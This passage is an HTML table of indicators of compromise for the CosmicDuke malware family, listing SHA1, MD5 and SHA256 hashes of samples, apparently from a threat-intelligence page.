<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">151362502D569B16453E84A2F5D277D8E4E878C2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">685d678b3ffd72fce3f8b48d82a76f60</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">70a7248b90573ba2edde5d9e8f0acd478235054480d98b0531d85725555f3a5c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">174373AB44CF6E7355F9DBB8469453519CB61A44</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">78c6245367e6ef00ca76b8106eb73816</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1dbb96c130b12eacfe2956b536ca8e8ef59691f513816011866320e0e77daab2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">18D983BA09DA695CE704AB8093296366B543996A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9dc3d5da2f68b4ed9336c5b78b955780</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">05637ef950feaeb0944d9fccca38eeff38e366c24a137ef08c9f1442aeb6afb7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1A31245E943B131D81375D70B489D8E4BF3D6DCE</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cce1577e03093dcf195449d208e544d7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0314ed09890d5aa2dba659fe1343be93d48c3875a89e261484967fea7ea6c7eb</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1CE049522C4DF595A1C4C9E9CA24BE72DC5C6B28</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1270217794b67491365048584a27a5ed</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0a013787f9c1731213059f2d8e1a7514f610783aaaea8fa5736063ab7793c0d7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1DF78A1DC0AA3382FCC6FAC172B70AAFD0ED8D3D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">39e1b41b4118f4ea3ce2119c054b29e8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">52d1b5387739dcf6a68efb21e8ccf83b9b29fb29724091d7a8084d2315f81d80</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1E5C6D3F64295CB36D364F7FA183177A3F5E6B7E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">868915de8b23cfc87765525efbdb4fa0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1c86bcc74684c2533026a8b4d9463ad4b5a1f30f6915ca19197b41e0cb893b77</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2345CD5C112E55BA631DAC539C8EFAB850C536B2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0b78ad10bb56a3f69f13297e427806cf</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2c480399bff7d05736caa1858fd43d9223df3fd531ae574dc3c9eb06cc3579ef</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2B1E7D54723CF9EE2FD133B8F17FA99470D7A51A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2c6a49568e1733b66ef9dd2fa659aedb</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">182ab7eb1dce2827a05aff0d83a13dd8346bd3b8ab2dfb681817a0d3aab05b15</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">322E042CF1CB43A8072C4A4CBF6E37004A88D6F7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b5304f94cd5baae6fb5dad19c2759d2c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">55ba0c04d488903e07f0747407ed56319f0d9aac113c7f9c62287442f1f78c45</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">332AAC7BDB0F697FD96E35C31C54D15E548061F4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dee4b9c620a390be143a79f555225c85</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ffc6a96b542196dbe322de199ee7b2621966d4c0d32ab43f78b9516a3576da09</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">365F61C7886CA82BFDF8EE19CE0F92C4F7D0901E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0295fb28f715a19e2b0c497b5dd55629</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cae1277446cb62f1ed3674e7ea87063a28b9d364e3638fa779fe8e3d6e1fb15f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3980F0E3FE80B2E7378325AB64ECBE725AE5ECA9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">52c73a7801a186077ed27a4cb7c7f887</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2e8aa9dac584a51c7d960baccf76747c858175573f5c013b7c44328f0871da04</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3F4A5BF72A15B7A8638655B24EB3359E229B9AEA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8019dea970331823a504baaa90d3470f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">82670519b8d63d36967c611bc94659e5bff867837129ac93bcffe7589af46384</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">42DBFBEDD813E6DBEA1398323F085A88FA014293</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">933b3c5d3728ef6e08af4ae579c00d11</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">47f3405ab0da5af125bcc6ebb6d17a1573b090c54d7a0a00630ec170ccc4b9d1</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4A9875F646C5410F8317191EF2A91F934CE76F57</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">68f6d84ac9a28c2fea59ff5e04577911</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5ef73d904cf5dcbec5919fba0b640168d6feb8f7021507568297e3da1a7e47a5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4AAAC99607013B21863728B9453E4FFEE67B902E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d22c02dafb1ee0ef8d4ea90ac48a6988</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f61cdc7f68f47d23c4571b517ab4cdcfd984cf3f6f8f91dec99dfd7dc5a2dcff</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4E3C9D7EB8302739E6931A3B5B605EFE8F211E51</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9d95c8f09f991a5fc37b79c45ebd2043</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3c5d2fcacafc21d9f43c595ddf03bec801ccb958b8641018612c21bc741800d0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4FBC518DF60DF395EA27224CB85C4DA2FF327E98</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ad02edae5173d0b7ba39a3065c9d5d63</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b7c4b998d7ebea62b81f2a12c5e8608a21079a0bcecdef81c0f5818a80b0c7eb</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4FD46C30FB1B6F5431C12A38430D684ED1FF5A75</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">75d15f552aba5ed0df80ec2c16ab683e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a1176b60ca96cfeb37dde61bde935f645a64fabd8e300f072fc355434b711dcf</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">524AAF596DC12B1BB479CD69C620914FD4C3F9C9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3c0ca0ab63a76dbf836725c95e2a5b7a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">75e8567e7667eb02eec661134ecc07a7970d9448fc5b7dc021b5bcb039953a47</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">541816260C71535CFEBC743B9E2770A3A601ACDF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6629b432266d78f9eb74d2d1a71d0d32</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">831267e0977becf098b5064aac6fd39b5f8e6fd975c06d4b8540cea71d402317</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">558F1D400BE521F8286B6A51F56D362D64278132</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5400d3db044befebbc39087ee1fe9533</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fede980fc70a86f949828b834edc0847490d497efcbd3a1155b7d3afe7c32543</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">55F83FF166AB8978D6CE38E80FDE858CF29E660B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8e5106565fd96df1308d208d1e3426a3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7e371cd323898e403df7a80add34d791e160e443bcd2d02f27ddc0c04ba1bdab</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">580ECA9E36DCD1A2DEB9075BCAE90AFEE46AACE2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">351c913e4120081d8f04317121654a39</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1590bdbaff2c178387e924b689b030057b4cbd2865e9c4dd3886a8791ac8e4ee</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5A199A75411047903B7BA7851BF705EC545F6DA9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f22606385080d35551e7f8e8f49b7de9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fe5bc1248fc79fc15663ef169f0a269c1abe847d00b01e9571fe5c0d760d68f0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5C5EC0B5112A74A95EDC23EF093792EB3698320E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3729a14be6b3a92265cf6d8e14c79abe</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">64e3a2bba82027dd6ff631fa5890a7ba8331b62a0a4c0b1ca24d143c2b61c323</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">63AEDCD38FE947404DDA4FBADDB1DA539D632417</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">89c6c5439a2747d7f2a7305521dddcbb</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">027c9da59c77e83b42535a0c965c4994a144715e796453fc2a5b189f0036c4b4</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6483ED51BD244C7B2CF97DB62602B19C27FA3059</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1e417aa350346731f6e0c936d725f1a5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8290b324f5cdb5c3ea17fa48a74bc11c856f0da0b049d07d9316d161f71f26a5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">658DB78C0CE62E08E86B51988A222B5FB5FBB913</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">18edd6bc785e56990f6721cd553c24ad</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">38c0252f75b1c6b3980e40bb69cb932773a6e0b189fc8a80efc2dcb455209eab</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6A43ADA6A3741892B56B0EF38CDF48DF1ACE236D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dc92eba92885f2e937cb6f694647eb71</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3d37e753812687fb7287cf8644d13fe2673ea7c3b540637c1ce1c6819f1c521b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6B7A4CCD5A411C03E3F1E86F86B273965991EB85</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cd012e8f5340d2e148d2c2cbac4270a1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">92172ff7bfeee332409a145bc626bebf732225d006877168f35c046368e5118c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6DB1151EEB4339FC72D6D094E2D6C2572DE89470</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5a7659b691a3caf107e6636d8906dcb0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">334ed05005ce829224d0dd4cc5baab6b837cf02ac0e321c8f97d11b3ba1c77a7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7631F1DB92E61504596790057CE674EE90570755</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">20d86cb4ebbffb739faa47f7354ee134</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d5f1d8d2629b91744fe812207cb3f0bebfd1aec9937b7744a263d1a4e3421063</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">764ADD69922342B8C4200D64652FBEE1376ADF1C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e175be029dd2b78c059278a567b3ada1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2146da9bc0e27d7eb10983b7dd89f250fa0015ce284dde8f0bb6a79626d34a2a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7803F160AF428BCFB4B9EA2ABA07886F232CDE4E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b59199877e0d68a5e93fc8ea76374ed1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5b50e26a01b320f05d66727e9d220d5858cdac203ff62e4b9ced1cafc2683637</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">78D1C1E11EBAE22849BCCB3EB154EC986D992364</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">23273a83bfd7aed10b9403e23a8bcba9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f6c62f9f846b3d100d60b1f2ae57a71c91dd8dc215dce652e2c85dff60c0197f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7AD1BEF0BA61DBED98D76D4207676D08C893FC13</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">925b37a936304a5914941ac4584e346c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">29585bb17b28e8b15b2a250be9516f416fa7cac84cc24aa4e004f6987323147e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">807C3DB7385972A78B6D217A379DAB67E68A3CF5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fa3b44b8a4a2a2b473cd5d934d1ec4bc</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1c348f1582385bfbf030abe20caabbd289d0f48a4076b1b6ccc417864070e9fe</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">88B7EAD7C0BF8B3D8A54B4A9C8871F44D1577CE7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">664b149ae8469cbda7fd7ed48c7dc9b6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4f9b6a88245f782d81e9eec9315b9444c83d68941f9fc23641e3909c8da9db9d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8A2227CAFA5713297313844344D6B6D9E0885093</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2a998ce2750335079d73e6b2eb2bd011</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">008beba8635e24baa50beee2e98654f73c04476a06fdcb893655f0a8201932d2</span></td></tr>
